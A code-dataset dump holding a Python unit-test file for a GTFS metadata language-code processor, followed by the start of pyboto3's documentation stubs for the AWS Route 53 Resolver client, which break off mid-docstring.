2021-03-09T15:27:51.000Z
|
2022-01-31T15:25:28.000Z
|
usecase/test/test_process_main_language_code_for_gtfs_metadata.py
|
MobilityData/mobility-database-interface
|
c6eb62b09e4784219c1d02e9f7cb88f77beaa2d8
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
from unittest import TestCase, mock
from unittest.mock import MagicMock, PropertyMock
from gtfs_kit.feed import Feed
from representation.gtfs_metadata import GtfsMetadata
from representation.gtfs_representation import GtfsRepresentation
from usecase.process_main_language_code_for_gtfs_metadata import (
process_main_language_code_for_gtfs_metadata,
AGENCY_LANG,
)
class TestProcessMainLanguageCodeForGtfsMetadata(TestCase):
    """Unit tests for ``process_main_language_code_for_gtfs_metadata``.

    The original tests repeated the same ~10 lines of mock construction in
    every case; that setup now lives in ``_make_representation`` and the
    shared "processor must not touch the language code" assertions live in
    ``_assert_not_processed``.
    """

    @staticmethod
    def _make_representation(agency_df=None):
        """Build mocks for one test case.

        When *agency_df* is given, the mocked dataset exposes it through an
        ``agency`` PropertyMock; when it is None the dataset carries no
        explicit ``agency`` property (the "missing files" scenario).

        Returns a ``(representation, metadata, agency_property)`` tuple;
        ``agency_property`` is None when *agency_df* is None.
        """
        mock_dataset = MagicMock()
        mock_dataset.__class__ = Feed
        mock_agency = None
        # `is not None` (not truthiness): an empty DataFrame must still be attached.
        if agency_df is not None:
            mock_agency = PropertyMock(return_value=agency_df)
            type(mock_dataset).agency = mock_agency
        mock_metadata = MagicMock()
        mock_metadata.__class__ = GtfsMetadata
        mock_gtfs_representation = MagicMock()
        mock_gtfs_representation.__class__ = GtfsRepresentation
        type(mock_gtfs_representation).dataset = mock_dataset
        type(mock_gtfs_representation).metadata = mock_metadata
        return mock_gtfs_representation, mock_metadata, mock_agency

    def _assert_not_processed(self, representation, metadata):
        """Run the processor and assert the language code was left untouched."""
        under_test = process_main_language_code_for_gtfs_metadata(representation)
        self.assertIsInstance(under_test, GtfsRepresentation)
        metadata.main_language_code.assert_not_called()

    def test_process_main_language_code_with_none(self):
        # None is not a GtfsRepresentation: must raise.
        self.assertRaises(TypeError, process_main_language_code_for_gtfs_metadata, None)

    def test_process_main_language_code_with_invalid_gtfs_repr(self):
        # A non-GtfsRepresentation object must be rejected.
        mock_gtfs_representation = MagicMock()
        mock_gtfs_representation.__class__ = str
        self.assertRaises(
            TypeError,
            process_main_language_code_for_gtfs_metadata,
            mock_gtfs_representation,
        )

    def test_process_main_language_code_with_missing_files(self):
        # Dataset without an explicit agency table: nothing to process.
        representation, metadata, _ = self._make_representation()
        self._assert_not_processed(representation, metadata)

    def test_process_main_language_code_with_missing_fields(self):
        # agency table present but lacks the agency_lang column.
        representation, metadata, _ = self._make_representation(pd.DataFrame({}))
        self._assert_not_processed(representation, metadata)

    def test_process_main_language_code_with_empty_file(self):
        # agency_lang column exists but has no rows.
        representation, metadata, _ = self._make_representation(
            pd.DataFrame({AGENCY_LANG: []})
        )
        self._assert_not_processed(representation, metadata)

    def test_process_main_language_code_with_non_string_language_code(self):
        # Non-string language codes must be ignored.
        representation, metadata, _ = self._make_representation(
            pd.DataFrame({AGENCY_LANG: [0]})
        )
        self._assert_not_processed(representation, metadata)

    def test_process_main_language_code(self):
        # Happy path: a valid string code is read and stored on the metadata.
        representation, metadata, agency_property = self._make_representation(
            pd.DataFrame({AGENCY_LANG: ["fr"]})
        )
        under_test = process_main_language_code_for_gtfs_metadata(representation)
        self.assertIsInstance(under_test, GtfsRepresentation)
        agency_property.assert_called()
        self.assertEqual(metadata.main_language_code, "fr")
| 40
| 88
| 0.740121
| 531
| 4,960
| 6.329567
| 0.107345
| 0.155311
| 0.183279
| 0.109491
| 0.87831
| 0.869979
| 0.869979
| 0.815234
| 0.769414
| 0.769414
| 0
| 0.000252
| 0.201411
| 4,960
| 123
| 89
| 40.325203
| 0.848271
| 0
| 0
| 0.66
| 0
| 0
| 0.000806
| 0
| 0
| 0
| 0
| 0
| 0.13
| 1
| 0.07
| false
| 0
| 0.07
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8265c2605b617170b38c2361baa3c2952da6015b
| 95,184
|
py
|
Python
|
pyboto3/route53resolver.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/route53resolver.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/route53resolver.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def associate_resolver_endpoint_ip_address(ResolverEndpointId=None, IpAddress=None):
    """Add an IP address to an inbound or outbound Resolver endpoint.

    Submit one AssociateResolverEndpointIpAddress request per IP address; to
    remove an address use DisassociateResolverEndpointIpAddress.
    See also: AWS API Documentation.

    :type ResolverEndpointId: string
    :param ResolverEndpointId: [REQUIRED] The ID of the resolver endpoint
        that you want to associate IP addresses with.
    :type IpAddress: dict
    :param IpAddress: [REQUIRED] Either the IPv4 address to add or a subnet
        ID (Resolver then chooses a free IP in that subnet). Keys:
        ``IpId`` (string, only when removing an address — get it from
        GetResolverEndpoint), ``SubnetId`` (string), ``Ip`` (string).
    :rtype: dict
    :return: ``{'ResolverEndpoint': {...}}`` describing the updated endpoint:
        Id, CreatorRequestId, Arn, Name, SecurityGroupIds (list of strings),
        Direction ('INBOUND'|'OUTBOUND'), IpAddressCount (integer),
        HostVPCId, Status ('CREATING'|'OPERATIONAL'|'UPDATING'|
        'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING'), StatusMessage,
        CreationTime, ModificationTime.

    Raises: Route53Resolver.Client.exceptions.ResourceNotFoundException,
    InvalidParameterException, InvalidRequestException,
    ResourceExistsException, InternalServiceErrorException,
    LimitExceededException, ThrottlingException.
    """
    pass
def associate_resolver_rule(ResolverRuleId=None, Name=None, VPCId=None):
    """Associate a resolver rule with a VPC.

    Once associated, Resolver forwards all DNS queries originating in the VPC
    for the rule's domain name to the DNS resolvers specified in the rule.
    For details about rules, see CreateResolverRule.
    See also: AWS API Documentation.

    :type ResolverRuleId: string
    :param ResolverRuleId: [REQUIRED] The ID of the resolver rule to
        associate with the VPC (list existing rules with ListResolverRules).
    :type Name: string
    :param Name: A name for the association being created.
    :type VPCId: string
    :param VPCId: [REQUIRED] The ID of the VPC to associate the rule with.
    :rtype: dict
    :return: ``{'ResolverRuleAssociation': {...}}`` with keys: Id (assigned
        by Resolver), ResolverRuleId, Name, VPCId, Status
        ('CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN'),
        StatusMessage.

    Raises: Route53Resolver.Client.exceptions.ResourceNotFoundException,
    InvalidRequestException, InvalidParameterException,
    ResourceUnavailableException, ResourceExistsException,
    InternalServiceErrorException, ThrottlingException.
    """
    pass
def can_paginate(operation_name=None):
    """Check if an operation can be paginated.

    :type operation_name: string
    :param operation_name: The operation name, identical to the client
        method name: e.g. for ``client.create_foo(**kwargs)`` pass
        ``'create_foo'``; if pagination is supported you can then use
        ``client.get_paginator('create_foo')``.
    """
    pass
def create_resolver_endpoint(CreatorRequestId=None, Name=None, SecurityGroupIds=None, Direction=None, IpAddresses=None, Tags=None):
    """Create a resolver endpoint (inbound or outbound).

    See also: AWS API Documentation.

    :type CreatorRequestId: string
    :param CreatorRequestId: [REQUIRED] A unique string identifying the
        request, allowing failed requests to be retried without the risk of
        running the operation twice (e.g. a date/time stamp).
    :type Name: string
    :param Name: A friendly name shown in the Resolver dashboard of the
        Route 53 console.
    :type SecurityGroupIds: list
    :param SecurityGroupIds: [REQUIRED] One or more security-group IDs
        controlling access to this VPC; they must include inbound rules for
        inbound endpoints or outbound rules for outbound endpoints.
    :type Direction: string
    :param Direction: [REQUIRED] 'INBOUND' (forward DNS queries to the VPC's
        DNS service from your network or another VPC) or 'OUTBOUND' (forward
        queries from the VPC's DNS service to your network or another VPC).
    :type IpAddresses: list
    :param IpAddresses: [REQUIRED] The subnets and IP addresses in your VPC
        that DNS queries pass through. Each dict has ``SubnetId`` (string,
        required) and optionally ``Ip`` (string).
    :type Tags: list
    :param Tags: Tags to associate with the endpoint; each dict carries
        ``Key`` and ``Value`` strings.
    :rtype: dict
    :return: ``{'ResolverEndpoint': {...}}`` describing the new endpoint:
        Id, CreatorRequestId, Arn, Name, SecurityGroupIds (list of strings),
        Direction ('INBOUND'|'OUTBOUND'), IpAddressCount (integer),
        HostVPCId, Status ('CREATING'|'OPERATIONAL'|'UPDATING'|
        'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING'), StatusMessage,
        CreationTime, ModificationTime.

    Raises: Route53Resolver.Client.exceptions.InvalidParameterException,
    ResourceNotFoundException, InvalidRequestException,
    ResourceExistsException, LimitExceededException,
    InternalServiceErrorException, ThrottlingException.
    """
    pass
def create_resolver_rule(CreatorRequestId=None, Name=None, RuleType=None, DomainName=None, TargetIps=None, ResolverEndpointId=None, Tags=None):
    """Create a Route 53 Resolver rule.

    For DNS queries that originate in your VPCs, specifies which resolver
    endpoint the queries pass through, one domain name that you want to
    forward to your network, and the IP addresses of the DNS resolvers in
    your network.

    See also: AWS API Documentation.

    Example::

        response = client.create_resolver_rule(
            CreatorRequestId='string',
            Name='string',
            RuleType='FORWARD'|'SYSTEM'|'RECURSIVE',
            DomainName='string',
            TargetIps=[{'Ip': 'string', 'Port': 123}],
            ResolverEndpointId='string',
            Tags=[{'Key': 'string', 'Value': 'string'}]
        )

    :type CreatorRequestId: string
    :param CreatorRequestId: [REQUIRED] A unique string that identifies the
        request and allows failed requests to be retried without the risk of
        executing the operation twice. Can be any unique string, for example
        a date/time stamp.
    :type Name: string
    :param Name: A friendly name that lets you easily find the rule in the
        Resolver dashboard in the Route 53 console.
    :type RuleType: string
    :param RuleType: [REQUIRED] Specify ``FORWARD``. Other resolver rule
        types aren't supported.
    :type DomainName: string
    :param DomainName: [REQUIRED] DNS queries for this domain name are
        forwarded to the IP addresses that you specify in ``TargetIps``.
        If a query matches multiple resolver rules (example.com and
        www.example.com), outbound DNS queries are routed using the rule
        that contains the most specific domain name (www.example.com).
    :type TargetIps: list
    :param TargetIps: The IPs that you want Resolver to forward DNS queries
        to (IPv4 only). Each element is a dict with ``Ip`` (string,
        required) and an optional ``Port`` (integer) at that IP.
    :type ResolverEndpointId: string
    :param ResolverEndpointId: The ID of the outbound resolver endpoint that
        you want to use to route DNS queries to the ``TargetIps`` addresses.
    :type Tags: list
    :param Tags: A list of tag dicts (``Key``/``Value`` strings) that you
        want to associate with the endpoint.
    :rtype: dict
    :return: ``{'ResolverRule': {...}}`` describing the CreateResolverRule
        request, including ``Id``, ``CreatorRequestId``, ``Arn``,
        ``DomainName``, ``Status`` (``COMPLETE``/``DELETING``/``UPDATING``/
        ``FAILED``), ``StatusMessage``, ``RuleType``, ``Name``,
        ``TargetIps``, ``ResolverEndpointId``, ``OwnerId`` and
        ``ShareStatus`` (``NOT_SHARED``/``SHARED_WITH_ME``/``SHARED_BY_ME``).

    Raises (``Route53Resolver.Client.exceptions``):
    ``InvalidParameterException``, ``InvalidRequestException``,
    ``LimitExceededException``, ``ResourceNotFoundException``,
    ``ResourceExistsException``, ``ResourceUnavailableException``,
    ``InternalServiceErrorException``, ``ThrottlingException``.
    """
    pass
def delete_resolver_endpoint(ResolverEndpointId=None):
    """Delete a resolver endpoint.

    The effect of deleting a resolver endpoint depends on whether it's an
    inbound or an outbound resolver endpoint.

    See also: AWS API Documentation.

    Example::

        response = client.delete_resolver_endpoint(
            ResolverEndpointId='string'
        )

    :type ResolverEndpointId: string
    :param ResolverEndpointId: [REQUIRED] The ID of the resolver endpoint
        that you want to delete.
    :rtype: dict
    :return: ``{'ResolverEndpoint': {...}}`` describing the
        DeleteResolverEndpoint request, including:

        - ``Id`` — the ID of the resolver endpoint.
        - ``CreatorRequestId`` — unique string from the request that created
          the endpoint; allows safe retries of failed requests.
        - ``Arn`` — the ARN (Amazon Resource Name) of the endpoint.
        - ``Name`` — name assigned in the CreateResolverEndpoint request.
        - ``SecurityGroupIds`` — list of security group IDs controlling
          access to this VPC.
        - ``Direction`` — ``INBOUND`` (DNS queries to your VPC from your
          network or another VPC) or ``OUTBOUND`` (queries from your VPC to
          your network or another VPC).
        - ``IpAddressCount`` — number of IP addresses the endpoint can use
          for DNS queries.
        - ``HostVPCId`` — the VPC the endpoint was created in.
        - ``Status`` — ``CREATING``/``OPERATIONAL``/``UPDATING``/
          ``AUTO_RECOVERING``/``ACTION_NEEDED``/``DELETING``.
        - ``StatusMessage`` — detailed status description.
        - ``CreationTime`` / ``ModificationTime`` — Unix time format, UTC.

    Raises (``Route53Resolver.Client.exceptions``):
    ``ResourceNotFoundException``, ``InvalidParameterException``,
    ``InvalidRequestException``, ``InternalServiceErrorException``,
    ``ThrottlingException``.
    """
    pass
def delete_resolver_rule(ResolverRuleId=None):
    """Delete a resolver rule.

    Before you can delete a resolver rule, you must disassociate it from
    all the VPCs that you associated the rule with. For more information,
    see DisassociateResolverRule.

    See also: AWS API Documentation.

    Example::

        response = client.delete_resolver_rule(
            ResolverRuleId='string'
        )

    :type ResolverRuleId: string
    :param ResolverRuleId: [REQUIRED] The ID of the resolver rule that you
        want to delete.
    :rtype: dict
    :return: ``{'ResolverRule': {...}}`` describing the DeleteResolverRule
        request, including:

        - ``Id`` — ID Resolver assigned to the rule when you created it.
        - ``CreatorRequestId`` — unique string you specified at creation;
          allows safe retries of failed requests.
        - ``Arn`` — the ARN (Amazon Resource Name) of the rule.
        - ``DomainName`` — DNS queries for this domain name are forwarded
          to the addresses in ``TargetIps``; the most specific matching
          rule wins when several rules match.
        - ``Status`` — ``COMPLETE``/``DELETING``/``UPDATING``/``FAILED``.
        - ``StatusMessage`` — detailed status description.
        - ``RuleType`` — always ``FORWARD``; other types aren't supported.
        - ``Name`` — name specified when the rule was created.
        - ``TargetIps`` — list of ``{'Ip': string, 'Port': integer}`` dicts
          that DNS queries are forwarded to (IPv4 only).
        - ``ResolverEndpointId`` — endpoint the rule is associated with.
        - ``OwnerId`` — for shared rules, the account the rule is shared
          with.
        - ``ShareStatus`` — ``NOT_SHARED``/``SHARED_WITH_ME``/
          ``SHARED_BY_ME``.

    Raises (``Route53Resolver.Client.exceptions``):
    ``InvalidParameterException``, ``ResourceNotFoundException``,
    ``ResourceInUseException``, ``InternalServiceErrorException``,
    ``ThrottlingException``.
    """
    pass
def disassociate_resolver_endpoint_ip_address(ResolverEndpointId=None, IpAddress=None):
    """Remove an IP address from an inbound or an outbound resolver endpoint.

    To remove more than one IP address, submit one
    DisassociateResolverEndpointIpAddress request for each address.
    To add an IP address to an endpoint, see
    AssociateResolverEndpointIpAddress.

    See also: AWS API Documentation.

    Example::

        response = client.disassociate_resolver_endpoint_ip_address(
            ResolverEndpointId='string',
            IpAddress={
                'IpId': 'string',
                'SubnetId': 'string',
                'Ip': 'string'
            }
        )

    :type ResolverEndpointId: string
    :param ResolverEndpointId: [REQUIRED] The ID of the resolver endpoint
        that you want to disassociate an IP address from.
    :type IpAddress: dict
    :param IpAddress: [REQUIRED] The IPv4 address that you want to remove
        from a resolver endpoint:

        - ``IpId`` (string) — only when removing an IP address from an
          endpoint: the ID of the IP address to remove (get it with
          GetResolverEndpoint).
        - ``SubnetId`` (string) — the ID of the subnet that includes the IP
          address to update (get it with GetResolverEndpoint).
        - ``Ip`` (string) — the new IP address.
    :rtype: dict
    :return: ``{'ResolverEndpoint': {...}}`` — the response to a
        DisassociateResolverEndpointIpAddress request, including ``Id``,
        ``CreatorRequestId``, ``Arn``, ``Name``, ``SecurityGroupIds``,
        ``Direction`` (``INBOUND``/``OUTBOUND``), ``IpAddressCount``,
        ``HostVPCId``, ``Status`` (``CREATING``/``OPERATIONAL``/
        ``UPDATING``/``AUTO_RECOVERING``/``ACTION_NEEDED``/``DELETING``),
        ``StatusMessage``, and ``CreationTime``/``ModificationTime``
        (Unix time format, UTC).

    Raises (``Route53Resolver.Client.exceptions``):
    ``ResourceNotFoundException``, ``InvalidParameterException``,
    ``InvalidRequestException``, ``ResourceExistsException``,
    ``InternalServiceErrorException``, ``ThrottlingException``.
    """
    pass
def disassociate_resolver_rule(VPCId=None, ResolverRuleId=None):
    """Remove the association between a specified resolver rule and a VPC.

    See also: AWS API Documentation.

    Example::

        response = client.disassociate_resolver_rule(
            VPCId='string',
            ResolverRuleId='string'
        )

    :type VPCId: string
    :param VPCId: [REQUIRED] The ID of the VPC that you want to
        disassociate the resolver rule from.
    :type ResolverRuleId: string
    :param ResolverRuleId: [REQUIRED] The ID of the resolver rule that you
        want to disassociate from the specified VPC.
    :rtype: dict
    :return: ``{'ResolverRuleAssociation': {...}}`` describing the
        DisassociateResolverRule request, including:

        - ``Id`` — ID of the rule/VPC association; assigned by Resolver
          when you submit an AssociateResolverRule request.
        - ``ResolverRuleId`` — the rule associated with the VPC in
          ``VPCId``.
        - ``Name`` — the name of the association.
        - ``VPCId`` — the VPC the rule was associated with.
        - ``Status`` — ``CREATING``/``COMPLETE``/``DELETING``/``FAILED``/
          ``OVERRIDDEN``.
        - ``StatusMessage`` — detailed status description.

    Raises (``Route53Resolver.Client.exceptions``):
    ``ResourceNotFoundException``, ``InvalidParameterException``,
    ``InternalServiceErrorException``, ``ThrottlingException``.
    """
    pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """Generate a presigned URL for a client method with the given arguments.

    :type ClientMethod: string
    :param ClientMethod: The client method to presign for.
    :type Params: dict
    :param Params: The parameters normally passed to ``ClientMethod``.
    :type ExpiresIn: int
    :param ExpiresIn: How many seconds the presigned URL stays valid.
        Defaults to one hour (3600 seconds).
    :type HttpMethod: string
    :param HttpMethod: The HTTP method to use on the generated URL. By
        default, the method is whatever the method's model uses.
    """
    pass
def get_paginator(operation_name=None):
    """Create a paginator for an operation.

    :type operation_name: string
    :param operation_name: The operation name, identical to the method name
        on the client. For example, if the method name is ``create_foo``
        (normally invoked as ``client.create_foo(**kwargs)``) and that
        operation can be paginated, call
        ``client.get_paginator('create_foo')``.
    :rtype: L{botocore.paginate.Paginator}
    :return: A paginator object.
    """
    pass
def get_resolver_endpoint(ResolverEndpointId=None):
    """Get information about a specified resolver endpoint.

    Returns details such as whether the endpoint is inbound or outbound
    and its current status.

    See also: AWS API Documentation.

    Example::

        response = client.get_resolver_endpoint(
            ResolverEndpointId='string'
        )

    :type ResolverEndpointId: string
    :param ResolverEndpointId: [REQUIRED] The ID of the resolver endpoint
        that you want to get information about.
    :rtype: dict
    :return: ``{'ResolverEndpoint': {...}}`` — the endpoint specified in
        the GetResolverEndpoint request, including:

        - ``Id`` — the ID of the resolver endpoint.
        - ``CreatorRequestId`` — unique string from the request that
          created the endpoint; allows safe retries of failed requests.
        - ``Arn`` — the ARN (Amazon Resource Name) of the endpoint.
        - ``Name`` — name assigned in the CreateResolverEndpoint request.
        - ``SecurityGroupIds`` — list of security group IDs controlling
          access to this VPC.
        - ``Direction`` — ``INBOUND`` (allows DNS queries to your VPC from
          your network or another VPC) or ``OUTBOUND`` (allows DNS queries
          from your VPC to your network or another VPC).
        - ``IpAddressCount`` — number of IP addresses the endpoint can use
          for DNS queries.
        - ``HostVPCId`` — the VPC the endpoint was created in.
        - ``Status`` — ``CREATING``/``OPERATIONAL``/``UPDATING``/
          ``AUTO_RECOVERING``/``ACTION_NEEDED``/``DELETING``.
        - ``StatusMessage`` — detailed status description.
        - ``CreationTime`` / ``ModificationTime`` — Unix time format, UTC.

    Raises (``Route53Resolver.Client.exceptions``):
    ``ResourceNotFoundException``, ``InvalidParameterException``,
    ``InternalServiceErrorException``, ``ThrottlingException``.
    """
    pass
def get_resolver_rule(ResolverRuleId=None):
    """Get information about a specified resolver rule.

    Returns details such as the domain name that the rule forwards DNS
    queries for and the ID of the outbound resolver endpoint that the rule
    is associated with.

    See also: AWS API Documentation.

    Example::

        response = client.get_resolver_rule(
            ResolverRuleId='string'
        )

    :type ResolverRuleId: string
    :param ResolverRuleId: [REQUIRED] The ID of the resolver rule that you
        want to get information about.
    :rtype: dict
    :return: ``{'ResolverRule': {...}}`` — the rule specified in the
        GetResolverRule request, including:

        - ``Id`` — ID Resolver assigned to the rule when you created it.
        - ``CreatorRequestId`` — unique string you specified at creation;
          allows safe retries of failed requests.
        - ``Arn`` — the ARN (Amazon Resource Name) of the rule.
        - ``DomainName`` — DNS queries for this domain name are forwarded
          to the addresses in ``TargetIps``; the most specific matching
          rule wins when several rules match.
        - ``Status`` — ``COMPLETE``/``DELETING``/``UPDATING``/``FAILED``.
        - ``StatusMessage`` — detailed status description.
        - ``RuleType`` — always ``FORWARD``; other types aren't supported.
        - ``Name`` — name specified when the rule was created.
        - ``TargetIps`` — list of ``{'Ip': string, 'Port': integer}`` dicts
          that DNS queries are forwarded to (IPv4 only).
        - ``ResolverEndpointId`` — endpoint the rule is associated with.
        - ``OwnerId`` — for shared rules, the account the rule is shared
          with.
        - ``ShareStatus`` — whether the rule is shared and in which
          direction: ``NOT_SHARED``/``SHARED_WITH_ME``/``SHARED_BY_ME``.

    Raises (``Route53Resolver.Client.exceptions``):
    ``ResourceNotFoundException``, ``InvalidParameterException``,
    ``InternalServiceErrorException``, ``ThrottlingException``.
    """
    pass
def get_resolver_rule_association(ResolverRuleAssociationId=None):
    """Get information about an association between a resolver rule and a VPC.

    You associate a resolver rule and a VPC using AssociateResolverRule.

    See also: AWS API Documentation.

    Example::

        response = client.get_resolver_rule_association(
            ResolverRuleAssociationId='string'
        )

    :type ResolverRuleAssociationId: string
    :param ResolverRuleAssociationId: [REQUIRED] The ID of the resolver
        rule association that you want to get information about.
    :rtype: dict
    :return: ``{'ResolverRuleAssociation': {...}}`` — the association
        specified in the GetResolverRuleAssociation request, including:

        - ``Id`` — ID of the rule/VPC association; assigned by Resolver
          when you submit an AssociateResolverRule request.
        - ``ResolverRuleId`` — the rule associated with the VPC in
          ``VPCId``.
        - ``Name`` — the name of the association.
        - ``VPCId`` — the VPC the rule is associated with.
        - ``Status`` — ``CREATING``/``COMPLETE``/``DELETING``/``FAILED``/
          ``OVERRIDDEN``.
        - ``StatusMessage`` — detailed status description.

    Raises (``Route53Resolver.Client.exceptions``):
    ``ResourceNotFoundException``, ``InvalidParameterException``,
    ``InternalServiceErrorException``, ``ThrottlingException``.
    """
    pass
def get_resolver_rule_policy(Arn=None):
    """Get information about a resolver rule policy.

    A resolver rule policy specifies the Resolver operations and resources
    that you want to allow another AWS account to be able to use.

    See also: AWS API Documentation.

    Example::

        response = client.get_resolver_rule_policy(
            Arn='string'
        )

    :type Arn: string
    :param Arn: [REQUIRED] The ARN of the resolver rule policy that you
        want to get information about.
    :rtype: dict
    :return: ``{'ResolverRulePolicy': 'string'}`` — information about the
        resolver rule policy specified in the GetResolverRulePolicy
        request.

    Raises (``Route53Resolver.Client.exceptions``):
    ``InvalidParameterException``, ``UnknownResourceException``,
    ``InternalServiceErrorException``.
    """
    pass
def get_waiter(waiter_name=None):
    """Return an object that can wait for some condition.

    :type waiter_name: str
    :param waiter_name: The name of the waiter to get. See the waiters
        section of the service docs for a list of available waiters.
    :rtype: botocore.waiter.Waiter
    """
    pass
def list_resolver_endpoint_ip_addresses(ResolverEndpointId=None, MaxResults=None, NextToken=None):
    """
    Gets the IP addresses for a specified resolver endpoint.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.list_resolver_endpoint_ip_addresses(
    ResolverEndpointId='string',
    MaxResults=123,
    NextToken='string'
    )
    :type ResolverEndpointId: string
    :param ResolverEndpointId: [REQUIRED]\nThe ID of the resolver endpoint that you want to get IP addresses for.\n
    :type MaxResults: integer
    :param MaxResults: The maximum number of IP addresses that you want to return in the response to a ListResolverEndpointIpAddresses request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 IP addresses.
    :type NextToken: string
    :param NextToken: For the first ListResolverEndpointIpAddresses request, omit this value.\nIf the specified resolver endpoint has more than MaxResults IP addresses, you can submit another ListResolverEndpointIpAddresses request to get the next group of IP addresses. In the next request, specify the value of NextToken from the previous response.\n
    :rtype: dict
    ReturnsResponse Syntax
    {
    'NextToken': 'string',
    'MaxResults': 123,
    'IpAddresses': [
    {
    'IpId': 'string',
    'SubnetId': 'string',
    'Ip': 'string',
    'Status': 'CREATING'|'FAILED_CREATION'|'ATTACHING'|'ATTACHED'|'REMAP_DETACHING'|'REMAP_ATTACHING'|'DETACHING'|'FAILED_RESOURCE_GONE'|'DELETING'|'DELETE_FAILED_FAS_EXPIRED',
    'StatusMessage': 'string',
    'CreationTime': 'string',
    'ModificationTime': 'string'
    },
    ]
    }
    Response Structure
    (dict) --
    NextToken (string) --
    If the specified endpoint has more than MaxResults IP addresses, you can submit another ListResolverEndpointIpAddresses request to get the next group of IP addresses. In the next request, specify the value of NextToken from the previous response.
    MaxResults (integer) --
    The value that you specified for MaxResults in the request.
    IpAddresses (list) --
    The IP addresses that DNS queries pass through on their way to your network (outbound endpoint) or on the way to Resolver (inbound endpoint).
    (dict) --
    In the response to a GetResolverEndpoint request, information about the IP addresses that the resolver endpoint uses for DNS queries.
    IpId (string) --
    The ID of one IP address.
    SubnetId (string) --
    The ID of one subnet.
    Ip (string) --
    One IP address that the resolver endpoint uses for DNS queries.
    Status (string) --
    A status code that gives the current status of the request.
    StatusMessage (string) --
    A message that provides additional information about the status of the request.
    CreationTime (string) --
    The date and time that the IP address was created, in Unix time format and Coordinated Universal Time (UTC).
    ModificationTime (string) --
    The date and time that the IP address was last modified, in Unix time format and Coordinated Universal Time (UTC).
    Exceptions
    Route53Resolver.Client.exceptions.ResourceNotFoundException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.InvalidNextTokenException
    Route53Resolver.Client.exceptions.ThrottlingException
    :return: {
    'NextToken': 'string',
    'MaxResults': 123,
    'IpAddresses': [
    {
    'IpId': 'string',
    'SubnetId': 'string',
    'Ip': 'string',
    'Status': 'CREATING'|'FAILED_CREATION'|'ATTACHING'|'ATTACHED'|'REMAP_DETACHING'|'REMAP_ATTACHING'|'DETACHING'|'FAILED_RESOURCE_GONE'|'DELETING'|'DELETE_FAILED_FAS_EXPIRED',
    'StatusMessage': 'string',
    'CreationTime': 'string',
    'ModificationTime': 'string'
    },
    ]
    }
    :returns:
    Route53Resolver.Client.exceptions.ResourceNotFoundException
    Route53Resolver.Client.exceptions.InvalidParameterException
    Route53Resolver.Client.exceptions.InternalServiceErrorException
    Route53Resolver.Client.exceptions.InvalidNextTokenException
    Route53Resolver.Client.exceptions.ThrottlingException
    """
    # Documentation-only stub: the real implementation is supplied at runtime
    # by the botocore-generated Route53Resolver client.
    pass
def list_resolver_endpoints(MaxResults=None, NextToken=None, Filters=None):
    """
    Lists all the resolver endpoints that were created using the current AWS account.
    See also: AWS API Documentation
    Exceptions
    :example: response = client.list_resolver_endpoints(
    MaxResults=123,
    NextToken='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ]
    )
    :type MaxResults: integer
    :param MaxResults: The maximum number of resolver endpoints that you want to return in the response to a ListResolverEndpoints request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 resolver endpoints.
    :type NextToken: string
    :param NextToken: For the first ListResolverEndpoints request, omit this value.\nIf you have more than MaxResults resolver endpoints, you can submit another ListResolverEndpoints request to get the next group of resolver endpoints. In the next request, specify the value of NextToken from the previous response.\n
    :type Filters: list
